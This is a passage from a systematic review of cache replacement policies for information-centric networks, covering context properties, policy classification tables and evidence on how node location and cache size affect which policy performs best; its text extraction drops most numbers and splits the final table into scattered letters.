dimensions according to four main categories: network, node, content, and human. figure illustrates the hierarchy of our classification. a context view is represented by current information of cached content in a particular node, which belongs to a network, and is accessed or produced by a user. each of these dimensions contains properties related to the cache eviction process in one or more of the surveyed articles. we detail the list of properties in the next subsection. additionally, we also consider icn architecture decisions as part of the context. the other cache-related protocols, such as placement policies or naming schemes, are relevant aspects and should be included as part of the context. this article surveyed the impacts of different architecture decisions on the replacement schemes; however, the discussion of specific caching protocols properties is out of the scope of this work. rq : context characteristics our second research question aims at identifying the context characteristics directly related to the policies. to this end, we collected the types of information used as input data for the replacement schemes and classified correspondent properties for the main context dimensions of fig. . we further discuss the context characteristics as follows: � the content dimension is subcategorized into four types of properties: feature, popularity, time-related, and type-specific. the feature properties are global ones, that is, are inherent to the content and usually do not vary according to the other context dimensions. conversely, popularity and time-related properties are related to the node caching the content, and consequently, their values differ from node to node. the type- specific subcategory is reserved for specifying singular aspects of data or application types. figure contains a list of properties extracted from the surveyed articles for the content dimension. in this case, the type-specific properties are mainly about video content, for illustrative purposes. � the node dimension is subcategorized in resource, connectivity, location, content- related, and traffic. accordingly, the resource properties are inherent to the node; connectivity and location features are mostly related to neighbor nodes and the position of the node into the topology. the content-related represents the intersection with the content’s dimension and gathers content’s information in a broader granularity. the traffic properties are related to the flows of data traffic passing through the node. figure shows the list of properties extracted from the surveyed articles for the node dimension. � the network dimension represents properties common to general network types. the properties are categorized into four classes: resource, topology, traffic, and pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time-related. the resource class groups the overall network capabilities, such as bandwidth, link capacity, and fetching content costs. the topology properties are more specific about network’s size, represented mainly with the distances between nodes. the traffic class has the same connotation as in the node dimension but differs in granularity, and the time-related class defines temporal properties. the presented properties in the time-related class are similar to some of the topology properties. they are related to the distance between nodes measured in time units to reflect the delay to retrieve content. figure presents the list of properties extracted from the surveyed articles for the network dimension. the previous list of properties is a broad definition of context characteristics to assist in the analysis of cache replacement schemes. it helps to visualize what dimensions are directly related to the policies and could significantly impact the applied network context. however, it is not a static list and can be increased as new information becomes available and relevant to a specific icn instance. furthermore, some of those properties are closely related to more than one context dimension. it is possible to change their perspective in terms of classification to represent a given icn context. moreover, the unified view of properties can substantiate the design of novel cache solutions by helping to identify potential gaps for new situations. the human dimension is an emergent and new approach to be explored as part of the context. recent research fields like people-centric networking (conti et al., ) and human-centric multimedia networking (rosário et al., ) are gathering attention to the basic fact that users play an essential role in demanding contents or network services, and different human characteristics can lead to different impacts on the network. in this way, human attributes are potential drivers in the design of network solutions. the many examples of human data, such as behaviors, interests, personality, character, social interactions, humor, daily routines, gender, age, etc., opens up a range of possibilities to be explored. pires et al. ( ) performed experiments with real user data and associated distinct user habits with different cache replacement policies. the work reinforces the relevance of the human dimension for network configuration. however, it is an incipient research field, and there is still a lack of studies intersecting human features with caching policies. thus, it was unsuitable for proposing a proper classification of properties for the human dimension in the current research. moreover, although some policies intended to incorporate features related to the user in the caching process (al-turjman, al-fagih & hassanein, ; xing et al., ; zhang, tan & li, ), the human characteristics are not directly used by the policies. for instance, wei et al. ( ) proposed a mobility-aware caching strategy for mobile networks in which they model the transition of users among wifi access points as a stationary markov model. in a broad sense, the user’s mobility has the same connotation as the node’s mobility. in the surveyed works that deal with mobility, the concept of a node’s mobility suits the objectives since the human dimension is not directly associated with mobility patterns. different user’s profiles can be associated with different mobility patterns, for example, different ages or professions (liang et al., ) or even different personalities (chorley et al., ). pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq : cache replacement schemes for icns the literature shows various proposed replacement schemes for icns exploring beyond the context of the content and adding properties of node and network’s dimensions. in this direction, we cataloged the replacement schemes applied to the surveyed articles to figure the hierarchy of context dimensions identified from the surveyed articles and the proposed classification for the correspondent characteristics associated with the cache replacement schemes. full-size doi: . /peerj-cs. /fig- content popularityfeature time-related type-specific - chunk/content size - chunk sequence number - content prefix name - chunk/content type - chunk/content priority - chunk/content category - chunk/content provider identification - chunk/content monetary cost - content's additional features (e.g., the type of multimedia, the style, the theme, the popularity before officially released, the aiming group, the cost, the place of origin, etc.) - chunk/content hit count - chunk/content request count - chunk/content category request count - chunk/content popularity degree (given and calculated by a content provider) - chunk/content initial popularity value (defined by content provider) - number of requests for neighboring chunks in a same content - chunk/content last access time - chunk/content penultimate access time - chunk/content requests arrival time - chunk/content average request arrival time - time when request for a chunk/content is satisfied (node response) - time when a chunk/content was written in the memory - time when a chunk/content request count is calculated - chunk/content creation time on producer - chunk/content expiration time - chunk/content maximum expiration time - counter which shows the recency of a chunk/content in the cache - video segment resolution level (video quality) - request count by video segment resolution level - weight value for each layer of encoded svc video packet (layers = video bitrate = quality) - for mpeg video: number of frames between two consecutive i-frames (called group of picture - gop) - for mpeg video: number of gops needed in a receiver to start playing. - for video with coding standards following network abstraction layer (nal): nal unit data type figure properties from content dimension extracted from the cache replacement schemes for icns. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ collect context features and understand their correlations. to better readability, we classified the schemes according to the classes of context information they used. they are classified in: content-based; content and network-based; content and node-based; content, network and node-based; and network and/or node-based schemes. tables – contain the lists of the cache replacement schemes in each class, respectively. the tables also detail the correspondent context property categories used by the policies, which reveal the diversity of context combinations explored in the literature. we grouped the policies accordingly. this classification provides a comprehensive view of what context node connectivityresource location content-related - cs cache capacity - number of interfaces - general cost of locally serving a chunk - storage energy consumed to store a chunk - memory slot number - pit interest-packet timeout - one-hop neighbor nodes - status of cache capacity of its one-hop neighbor nodes - number of occurrences of a content within the one-hop neighborhood - information of the content with the lowest popularity from one- hop neighbors nodes - number of neighbor nodes which requested a content - mobility pattern - location of the node into the topology - node betweenness centrality (the number of times a specific node lies on the content delivery paths between all pairs of nodes in a network topology) - reachability of a node (as a function of the number of nodes between any two nodes) - node´s general rank according to topology position (either assigned arbitrarily or based on some metric such as betweenness centrality, closeness centrality, or node degree) - number of contents - number of content video titles - number of chunks by content - number of chunks by content video titles - number of chunks by producer - number of chunks by category - number of contents by prefix name portion - maximum chunk resquest rate (know at the node at any instant of time) - minimum chunk request rate (predefined minimum popularity threshold value to be cached) - interface of incoming request for a chunk - number of interfaces saved in the pit entry for a chunk traffic - number of flows (active downloads) currently passing over each of the node interfaces - total request rate - number of broadcasted video frames per second; figure properties from node dimension extracted from the cache replacement schemes for icns.full-size doi: . /peerj-cs. /fig- network resourcetopology traffic time-related - distance / hop count from the node to the content producer - distance / hop count from the node to the next node caching the content; or the content producer - distance / hop count from the node to the consumer - maximun hop count possible from the node to a content producer - euclidean distance from the node to the content producer - number of nodes - link capacity - ling general cost - bandwidth consumed in downloading a chunk - energy cost of fetching a chunk from other caches or the source - energy cost for wireless transmission a chunk from an access point to the requester user equipment - general cost of fetching a chunk from the nearest neigbor - general cost of fetching a chunk from the content producer - general cost of transferring a chunk across two nodes - the max cache capacity within a sub-network - total request rate for all chunks being requested by all nodes - total request rate for a chunk being requested by all nodes - number of users - network delay for retrieving a content - maximum delay for retrieving a content figure properties from network dimension extracted from the cache replacement schemes for icns. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table content-based cache replacement schemes. content property categories replacement schemes popularity rossi & rossini ( ), chao et al. ( ), ran et al. ( ), yeh et al. ( ), nakayama, ata & oka ( ), liu, zhu & ma ( ), zhao et al. ( ), kalghoum & gammar ( ), sinky et al. ( ), li, yu & li ( ), kalghoum & saidane ( ) time-related ravi, ramanathan & sivalingam ( ), li, ma & hu ( a), rezazad & tay ( ), rhaiem, fourati & ajib ( ), shukla & abouzeid ( ), dhiab et al. ( ), vural et al. ( ), hou et al. ( ), meddeb et al. ( ), din et al. ( ) popularity and time-related wang et al. ( a), neves dos santos et al. ( ), qian et al. ( ), chen et al. ( ), abidi & gammar ( ), xin et al. ( ), yao et al. ( ), chootong & thaenthong ( ), zhang, tan & li ( ), huang et al. ( ), tang et al. ( ) popularity, time-related and feature kang, lee & ko ( ), bilal & kang ( ), han et al. ( ), bilal & kang ( ), sri prakash & moharir ( ), sertbaş et al. ( ) time-related and feature thomas & xylomenos ( ), rao, schelen & lindgren ( ), wu et al. ( ), tarnoi et al. ( ) popularity and feature chandrasekaran, wang & tafazolli ( ), chandrasekaran et al. ( ), lee & hong ( ) popularity and type-specific jia et al. ( ), ge et al. ( ) time-related and type-specific zhang et al. ( c) time-related, type-specific and feature ghahfarokhi, moghim & eftekhari ( ) type-specific and feature lee, lim & yoo ( ) popularity, time-related, type- specific and feature lee, lim & yoo ( ) table content and node-based cache replacement schemes. content property categories node property categories replacement schemes popularity location wei et al. ( ), chen et al. ( ), mick, tourani & misra ( ), lal & kumar ( ) content-related lal & kumar ( ), zhang, tan & li ( b), baugh & guo ( ) traffic saltarin et al. ( ) traffic and connectivity yang & choi ( ) traffic and location liu et al. ( b) popularity and time-related traffic karami & guerrero-zapata ( ), rocha et al. ( ), zhou & ye ( ), khan & khan ( ), qu et al. ( ) connectivity an & luo ( ) content-related and traffic yao et al. ( ) time-related and feature content-related hahm et al. ( ) connectivity and location aoki & shigeyasu ( ) popularity, time-related and feature connectivity wood et al. ( ) content-related and traffic ong et al. ( ) popularity and feature content-related li et al. ( b), dron et al. ( ) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table content and network-based cache replacement schemes. content property categories network property categories replacement schemes popularity topology wang et al. ( ), wang, bi & wu ( b), ming, xu & wang ( ), ren et al. ( ), hu et al. ( ), huang et al. ( ), khan et al. ( ) resource caarls, hargreaves & menasché ( ) traffic and time- related sinky et al. ( ) popularity and time- related topology chen, fan & yin ( ), ostrovskaya et al. ( ) time-related yokota et al. ( ) resource pal & kant ( ) popularity and feature resource wang, bayhan & kangasharju ( ) time-related sun & wang ( ) resource and time-related ndikumana et al. ( ) popularity, time- related and feature topology duan et al. ( ) time-related time-related dai et al. ( ) feature resource xing et al. ( ) table content, node, and network-based cache replacement schemes. content property categories node property categories network property categories replacement schemes popularity and feature content-related and location topology panigrahi et al. ( ) content-related and traffic traffic liu et al. ( ) traffic resource badov et al. ( ) resource time-related and resource gür ( ) popularity and time-related content-related topology rath, panigrahi & simha ( ) traffic and location topology and time-related al-turjman, al-fagih & hassanein ( ) popularity traffic topology chen et al. ( ) connectivity topology and resource zhang et al. ( ) time-related resource topology and resource llorca et al. ( ) location topology naz, rais & qayyum ( ) popularity, time-related and feature traffic topology and time-related al-turjman ( ) table node and/or network-based cache replacement schemes. node property categories network property categories replacement schemes content-related and location topology wang & bensaou ( a, b), yanuar & manaf ( ) content-related and resource time-related sureshjani & moghim ( ) resource resource wang et al. ( a) – resource ioannidis & yeh ( , ) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information the techniques required. therefore, it is the first guide to map which context variances could directly influence the performance of the technique. the content-based replacement policies explore only the characteristics of the content to make the eviction decision. they use one or more of the content features listed in fig. . following this reasoning, the policies that explore beyond the content and start to look to characteristics of the node or the network that could lead the eviction process to make a better decision are classified accordingly. they also use one or more features listed in fig. or fig. . naturally, almost all the schemes further explore the content dimension; however, we also found methods dealing only with network and node features to assist the eviction process. figure illustrates the usage distribution of context properties by their categories. we ranked the context categories according to the number of policies that used one or more of the corresponding category properties. after content popularity, time-related and feature properties, the network topology and node traffic properties are the most used ones. it is important to remark that for the classification of policies, we did not account for the general use of node cs cache capacity and the number of interface information, since it can usually be part of the caching process. rq : effects of context variation our objective in this section is to carry out an evidence-based analysis and identify what context dimensions can affect the policies’ performance. an evidence-based analysis can increment and drive approximate solutions to the problem of finding the optimal policy. the choice of a best-fitting replacement policy exponentially grows in complexity when there is a diversity of context variables. many efforts have been employed to comparatively evaluate different policies in different network scenarios. usually, the evaluations comprises variations of context like cache size, topology, or content popularity. the results gives us approximations and insights about which policy performs better in the evaluated scenarios or which variations in context can impact the policy’s decisions. such information is essential to help the process of network design when deciding which content - popularity content - time-related content - feature network - topology node - traffic node - content-related node - location network - resource network - time-related content - type-specific node - connectivity node - resource network - traffic figure distribution of context properties categories according to the number of policies that used the correspondent properties in their eviction logic. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ replacement policy should be instantiated in a given network scenario. in this way, we collected reported evidence from the surveyed articles about the effects of context variations on replacement schemes’ performance. we have found policy comparisons in different scenarios with variations of many aspects like request rates, forwarding strategies, number of consumers, number of contents, and overall topology. nevertheless, in summary, we found that variations in the node location, cache size, cache placement policy and content popularity had some relevant effect on the policies’ performance. the first three presented variations resulting in different choices of replacement policies. also, beyond the impact on the choosing point of which cache replacement schemes to apply, variations in cache size and content popularity presented other relevant effects related to the policies’ performance. we discuss the context variations separately in the following. to support the reading, table presents a description of the policies reported in this section. node: location the works from wang & bensaou ( a), tarnoi et al. ( ), gallo et al. ( ), li, simon & gravey ( ) and newberry & zhang ( ) presented evidence of the impact of node’s location on cache replacement scheme choice. table summarizes the characteristics of the scenarios that supported the analyses. in the following, we discuss the reported impacts: � wang & bensaou ( a) proposed two complementary replacement algorithms to handle different workload characteristics observed by both edge and intermediate router nodes. the eviction logic uses the hop count factor to prioritize the maintenance of more distant contents and, consequently, reduce network resource consumption. besides the hop count, the replacement algorithm for intermediate nodes considers the number of node’s interfaces saved in the pit entry for a content to estimate the diversity of the content requests. the proposed solution outperforms homogeneous configuration with lce + lru, and the results emphasize the benefits of using heterogeneous replacement policies according to the location of the node into the topology. however, the eviction solutions were evaluated only in conjunction with a proposed placement policy named ppc, limiting the analysis of the heterogeneous eviction solution separately. the proposed replacement schemes logic would be able to work together with other location policies, like lce. � li, simon & gravey ( ) used the lrfu policy with a weighting parameter y to represent a multi-policy caching where every content router implements its caching policy according to its location in the network. the lrfu behavior can switch to be more closely similar to lru or lfu according to the value of y. the router location is relative to his position between users and servers. the routers (crs) are classified according to a defined “entering degree”, which represents the number of the shortest path connecting front-end crs with servers via a cr. the reasoning to configure different values of lrfu parameter y comes from an experiment under an emulated european backbone ebone topology with nodes, in which they performed experiments with homogeneous configurations of y in all routers. they observed that the pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ routers with lower hit rate achieved their best performance with higher values of y, and on the contrary, routers with higher hit rates achieved their best performance with lower values of y. allied to that, they also observed that the position of the router in the hit rate rank is directly proportional to his position in the topology, in the sense that the closer to the edge, the higher is the hit ratio performance. � the experiments of tarnoi et al. ( ) reveal the difference of performances between lru and random according to the node position. for the experiment with a cascade network scenario and one content requester, lru and random, in combination with lce placement policy, interchange positions on the rank of the cache hit performance: for the level , lru outperforms random, but from level onward, lru performance decreases drastically and random also slightly decreases but now with better performance than lru. the difference in the rank of cache hit rate is similar for the scenario variation with multiple content requests, but lru and random interchange position after the third level node. for the internet topology, the result groups edge and core nodes, and again, lru presented the best results for edge nodes while random for core nodes. � continuing the discussion about lru and random replacement policies, gallo et al. ( ) came to a similar conclusion in terms of the difference in performance when varying node locations. for that, the authors presented an analysis of cache miss probability depending on the content popularity distribution. the analysis suggest that lru and random have significantly different performances only for popularity distributions highly concentrated on a relatively small number of objects. that difference is also relative to the position of the node in the topology. the more popular objects are more likely to be found at the edge node when using lru, but those more popular objects can be more evenly distributed when using random across the path. also, the evaluation presents heterogeneous configuration for the leaves and root levels of a tree topology: lru-random and random-lru, also lru-lru and random- random. the heterogeneous lru-random configuration achieved better performance than the other configuration options, that is, lru and random configured respectively in the edge and intermediate levels. � while evaluating the advantages of integrating big data applications in an icn-like architecture, newberry & zhang ( ) argue the benefits of using different cache replacement policies at each layer of a data center fat-tree topology. they compared the performance of homogeneous and heterogeneous policy configurations, placing the cache in each node of a fat-tree topology with three layers, composed of core, aggregation, and edge switches. they performed combinations of the policies lru, q, arc, lirs, and mq, on the levels of the tree topology, totaling combinations for each variation of cache size. the results could reveal the different behaviors at different layers of the topology and the suitability of different policies at each level. however, the gain of the reported best heterogeneous configurations concerning the best homogeneous configuration is not explicit in the article. pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table set of content placement and replacement policies. abbrev. policy name type description references lru least recently used replacement removes the last accessed content in the cache – lfu least frequently used replacement removes the last frequently used content in the cache – fifo first-in-first-out replacement removes the oldest content placed in the cache – – random replacement removes one content randomly – – size replacement removes the content with largest size in the cache abrams et al. ( ) lrfu least recently/frequently used replacement considers the recency and frequency of contents to compute a combined recency and frequency (crf) metric. crf values are higher for more recent and frequent contents. the policy evicts contents with lower crfs lee et al. ( ) fcdc fast convergence caching replacement algorithm based on dynamic classification method replacement considers categories of contents by content’s popularity and a popularity rank by categories. contents in lower ranked categories can be evicted for ones in higher ranked categories chao et al. ( ) ruf recent usage frequency replacement considers categories of contents by similarity and a popularity rank by categories. contents in lower ranked categories can be evicted for ones in higher ranked categories kang, lee & ko ( ) ev energy efficiency cache scheme based on virtual round trip time placement/ replacement considers the energy consumption to store and to transport the content. places the contents with storage energy smaller than their transport energy, and compares the energy saving of the cached contents with the energy saving of the passing content to evict the contents wang et al. ( a) pbrs content-popularity and betweenness based replacement scheme replacement removes the content with the lower popularity. computes the content popularity based on the content’s requests and node’s betweenness centrality liu et al. ( b) abc age-based cooperation replacement removes the content based on content’s time-to-live (ttl). computes ttl based on the node’s location in the topology and the content popularity. the closer to the edge and/or the more popular a content, the longer its ttl value. also called ttl ming, xu & wang ( ) q two queues replacement designed for buffer management, it considers two lists of pages. the first list applies fifo in the incoming page requests. the second list receives the pages in the first list requested again and their subsequent requests and applies lru johnson & shasha ( ) arc adaptive replacement cache replacement designed for buffer management, it considers two lru lists. the first list contains pages requested once in a recent time, and the second list pages requested at least twice. the policy adaptively decides the number of pages to maintain in each list according to the workload characteristic megiddo & modha ( ) lirs low inter-reference recency set replacement designed for buffer management, it considers the number of other pages accessed between the last and penultimate access for a page as inter-reference recency (irr) metric. the policy removes the page with the largest irr jiang & zhang ( ) mq multi-queue replacement designed for buffer management, it considers multiple lists with different access frequencies for different periods zhou, philbin & li ( ) ppc popularity prediction caching replacement designed for video content. predicts and caches the future most popular videos’ chunks based on the number of requests for neighboring chunks in the same video content. evicts chunks with the least future popularity zhang, tan & li ( ) (continued) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ all the scenarios discussed in this subsection concluded that heterogeneous policy configurations achieved the highest performances than the homogeneous configurations. whether for small topologies (tarnoi et al., ; gallo et al., ) or larger topologies (wang & bensaou, a; li, simon & gravey, ; tarnoi et al., ; newberry & zhang, ), the works observed different traffic characteristics in the different nodes. they attributed this difference to the node position and associated different policies to different traffic profiles. multiple levels of caches naturally present that difference in traffic characteristics by cache-level due to the knowing filtering-effect. the filtering-effect happens any time a lower-level cache hits a content request. the cache does not propagate that request to the rest of the network and propagates only the miss requests to upper-level caches. this behavior modifies the original characteristics of the traffic. many studies have been addressing the progressive filtering effect in hierarchical web caches (williamson, ; zhou et al., ; melazzi et al., ). that filtering has a direct impact on the temporal locality of the requests (jin & bestavros, ). temporal locality refers to the property that recently accessed objects are likely to be reaccessed in the near future. as cache levels table (continued) abbrev. policy name type description references ccp cache policy based on content popularity replacement considers previous content popularity and the number of hits in a current interval of time to compute the current content popularity. the policy evicts less popular content ran et al. ( ) betw betweenness centrality placement considers the node’s position at the topology in terms of node’s centrality measures to place the content. only selected nodes with higher measures cache the content. also called leave- copy-betw (lcb), or centrality chai et al. ( ) lcd leave copy down placement places the content only in the immediate downstream node of a cache-hit point laoutaris, syntila & stavrakakis ( ) lce leave copy everywhere placement places the contents in all caches along the reverse path of the content request laoutaris, syntila & stavrakakis ( ) prob probabilistic caching placement each cache in the reverse path of the content request stores the content with a constant probability p. also called leave- copy-probabilistically (lcp) laoutaris, syntila & stavrakakis ( ) – probcache placement considers the shared storage capacity of the request path and the node’s distance to the content producer to calculate the node’s probability of caching the content; also called pprob psaras, chai & pavlou ( ) – crcache placement considers the content popularity and the node’s centrality measures to calculate the probability of caching the content. the most popular contents are cached in the nodes with the highest centrality. also called cross wang et al. ( b) pcp progressive caching policy placement considers the immediate downstream node of a cache-hit point to store the content, the number of interfaces saved in pit entry for the intermediate nodes, and the number of requests for edge nodes wang & bensaou ( a) rand single node random caching placement places the contents in one random intermediate node along the delivery path eum et al. ( ) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ filter requests, the temporal locality intensity becomes gradually weakening, and the traffic profile at upper-level caches becomes more random (jin & bestavros, ). that explains why random policy achieved better performances for intermediate nodes in some of the discussed scenarios. as expected, workloads with temporal locality property have a strong correlation with caching policies (garetto, leonardi & martina, ), and variations in the temporal locality patterns directly impact the variations of caching policies performances. regarding the context attributes explored by the replacement schemes, only two of the works presented evaluations including context features in the eviction logic that helped differentiate the node’s position: like the node’s number of interfaces (wang & bensaou, a) and the node degree as a general rank according to the topology (li, simon & gravey, ). however, other works are exploring those, and other context attributes that could be helpful. the context attributes with their respective classification and reference works are: � node-location: node betweenness centrality (chen et al., ; liu et al., b); � node-location: reachability of a node (panigrahi et al., ); � node-location: node’s general rank according to topology position (mick, tourani & misra, ; aoki & shigeyasu, ; naz, rais & qayyum, ); � node-content-related: number of interfaces saved in pit entry for a chunk (wang & bensaou, a); � node-connectivity: one-hop neighbor nodes (zhang et al., ); � node-resource: number of interfaces (wang & bensaou, a; baugh & guo, ). although the node’s location is a context that should be considered when selecting a replacement policy, it is not easy to foresee a straight map between policies and node positions. first, because there are many policies and diversity of topologies with different requirements, but mostly because there are other contextual factors that can also impact the performance of the policies. as we continue to show in the next sections, this slr was able to pinpoint some of these factors. node: cache size the works from chao et al. ( ), wang et al. ( a), sun et al. ( ), newberry & zhang ( ) and liu et al. ( b) contains evidence of cache size variations on the performance ranking variations of cache replacement policies. table summarizes the characteristics of the corresponding scenarios. in the following, we discuss the reported impacts: � according to sun et al. ( ), the replacement scheme’s optimal choice depends on the cache size and the placement policy. the authors combined seven placement policies with five replacement policies: lru, lfu, fifo, ttl, size - and cache size variations of . %, . %, . %, and . % of the unique contents. the content routers have homogeneous cache sizes for all experiments. we observe that the most significant impact on the replacement scheme choice happens when passing from . % to pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . % of cache sizes. that is, for all combinations of placement policies, the best choice of replacement scheme changed when the cache size moved from . % to . %. meanwhile, for most combinations of placement policies, the experiments running with . %, . %, and . % of cache sizes presented their highest performance values with the same replacement policy. for example, combined with lce, lru and ttl achieved the highest performances for . % of cache size, while lfu stands out for the other sizes. � chao et al. ( ) also show evidence that variations on cache size can lead to variations on the policy with the best performance. this work presents a content-based replacement policy named fcdc that manages the content popularity property— request count—to classify and replace contents according to popularity categories. the evaluation shows comparisons of the proposed scheme against lru and ruf policies. according to the results, fcdc presents a better cache hit rate than lru and ruf when the cache memory is less than %. yet, the performance rank changed for cache sizes larger than %, and lru performed slightly better than fcdc. the authors attribute this behavior to each policy’s property, in which fcdc can keep track of content popularity and maintain the most popular content better than lru for small cache sizes. at the same time, lru prioritizes most recently accessed over the most accessed and popular content. however, this does not directly correlate to the performance differences according to the cache sizes. fcdc deals with dynamic changes of content popularity and does not directly rely on node information. � furthermore, the experiments performed by wang et al. ( a) also reveal differences in policy performance rank while varying the cache size. the work proposes the ev policy, a node-based replacement scheme coupled with a placement scheme. ev was evaluated and compared against lce + lru and lce + popu—a referenced popularity- based policy. the configuration of the content popularity follows a zipf distribution, and besides the impact of different cache sizes, the results also reveal a correlation with the popularity skewness factor. for α skewness factor equals . , ev and popu had similar performances for all cache size variations. meanwhile, for α = . or . , the policies interchanged positions in the rank of average total energy consumption for different cache sizes: popu achieved better performance than ev for cache sizes between % and % of total contents; for larger cache sizes, ev turns to be the better choice. the work does not provide an analysis of this effect. the results show the impact of cache size on placement and replacement schemes together, which limits the evidence of the eviction scheme solely. � similarly, liu et al. ( b) presented evidences of variations in the rank of hit ratio of the policies for different cache sizes. the work shows evaluations of a proposed replacement policy named pbrs against lru, lfu, and fifo. pbrs and lfu interchange positions for different cache sizes in a tree topology. this effect is most evident for intermediate nodes, in which lfu presented better results for cache sizes between mb to approximately mb, and pbrs presented better cache hit values for larger cache sizes. both policies rely on content popularity, but lfu computes the pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ popularity directly to count the number of requests, while pbrs increments the computation by adding different weights associated with the nodes. � finally, besides the effect of heterogeneous policies for different node locations in a fat- tree topology observed by newberry & zhang ( ), we also observed variations in policy performances’ rank while varying cache sizes. the work evaluated lru and other replacement policies named q, arq, lirs, and mq policies. for a homogeneous policy configuration in all levels of the topology, the rank of policy performances did not change when using cache sizes from to mb. however, when cache sizes varied from mb to gb, a couple of changes happened in the rank: first, lru and q interchanged positions, in witch q achieved best results than lru up to mb, but lru presented better results for gb; second, arq and mq changed positions, with mq presenting better results up to mb and arq with gb; and finally, lirs and arq also changed positions in the rank, with lirs presenting better results than all other policies up to mb, but arq achieved better performance with gb of cache size. for a heterogeneous policy configuration, the results presented similar effects on the rank. without going into specific characteristics of policies, this work has evidence of the influence of cache size and the lack of explicit patterns that associate the performance of cache policies with the size of the cache. regarding the impact on the replacement policy choice, in none of the presented works it is evident why variations in cache size led to different policy choices. also, the analysis of the works together does not reveal potential patterns due to the heterogeneity of the scenarios factors. the scenarios range from country-wide router-level topology with around k routers to a small and straightforward linear topology, with variations of placement and replacement policies, and different ranges of cache size evaluations. although the evidence clearly shows the relevance of cache size in particular scenarios, it is not sufficiently conclusive the why. yet, we cataloged other effects concerning variations on the cache cache and the performance of the policies. it is natural to expect an increase in the cache size should increase the performance gain for any caching policy since there is more space to store contents. in practice, the constraints of memory access speed or node devices’ power will limit cache size. however, evidence shows that caching policies’ performance gain is not linear to the cache size increase (han et al., ; chen et al., ; ong et al., ; sun et al., ; pires et al., ; mangili, martignon & capone, ). in this way, adding cache resources on the network could not be the most suitable solution to improve the performance. the observed effect is because size allocation is a function of the content’s popularity distribution. for example, in scenarios with large amounts of non-popular content, the cache size may be small because the gain in caching is restrictive. on the contrary, for scenarios with a large amount of popular content, the benefits will be best achieved for larger cache sizes. in this way, balancing optimal cache size in terms of cost and effectiveness of policies shall be done considering the fluctuations in content popularity. pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le s ce n ar io s co n ce rn in g re p la ce m en t p o li ci es ev al u at io n s w it h d if fe re n t ef fe ct s o n th e p o li cy ch o ic e. n et w o rk n o d e c o n te n t ic n ar ch it ec tu re r ef er en ce s t o p o lo gy n . c o n s. / n . p ro d . n . o b je ct s an d r eq u es ts l o ca ti o n o f th e n o d e c ac h e si ze p o p u la ri ty (z ip f( a) ) c h u n k si ze p la ce m en t p o li cy e vi ct io n p o li cy m et ri cs e ff ec t w an g & b en sa ou ( a ) in te rn et -l ik e; c r s – / . o b je ct s, ea ch w it h [ - ] o r [ - ] ch u n ks ; t o ta l o f . o b je ct re q u es ts e d ge an d in te rm ed ia te [ – , ] ch u n ks [ . ; . ] an d [ . ; . ] k b l c e an d p c p l r u ; p ro p o se d ed ge an d co re h it ra te ; h it ga in ; p at h st re tc h [n od e- lo ca ti on ] d if fe re n t p o li ci es fo r d if fe re n t n o d e lo ca ti o n s; l im it ed ev al u at io n l i, si m on & g ra ve y ( ) in te rn et -l ik e; c r s , / o b je ct s, ea ch w it h [ – ] ch u n ks ;t o ta l o f . ch u n ks ; si m u la ti o n ti m e o f . m in e d ge an d in te rm ed ia te ch u n ks . – l c e l r u , l f u an d l r f u m u lt i- γ h it ra te ; n u m b er o f ac ce ss to se rv er [n od e- lo ca ti on ] d if fe re n t co n fi gu ra ti o n s o f l r f u fo r d if fe re n t n o d e lo ca ti o n s t ar n oi et al . ( ) c as ca d e; c r s / an d / . o b je ct s; si m u la ti o n ti m e o f . s e d ge an d in te rm ed ia te , , , an d o b je ct s [ . – . ] – l c e an d p ro b l r u , l f u an d r an d o m h it ra te ;s er ve r lo ad ; r o u n d tr ip h o p d is ta n ce [n od e- lo ca ti on ] l r u an d r an d o m in te rc h an ge p o si ti o n s fo r d if fe re n t n o d e lo ca ti o n s; [p la ce m en t- po li cy ] d if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t p la ce m en t p o li ci es t ar n oi et al . ( ) in te rn et -l ik e; c r s / . o b je ct s; si m u la ti o n ti m e o f . s e d ge an d in te rm ed ia te , , , an d o b je ct s [ . – . ] – l c e an d p ro b l r u , l f u an d r an d o m h it ra te ;s er ve r lo ad ; r o u n d tr ip h o p d is ta n ce [n od e- lo ca ti on ] l r u an d r an d o m in te rc h an ge p o si ti o n s fo r d if fe re n t n o d e lo ca ti o n s. [p la ce m en t- po li cy ] d if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t p la ce m en t p o li ci es g al lo et al . ( ) t re e; c r s / . o b je ct s e d ge an d r o o t [ – ] o b je ct s . – l c e l r u an d r an d o m m is s p ro b 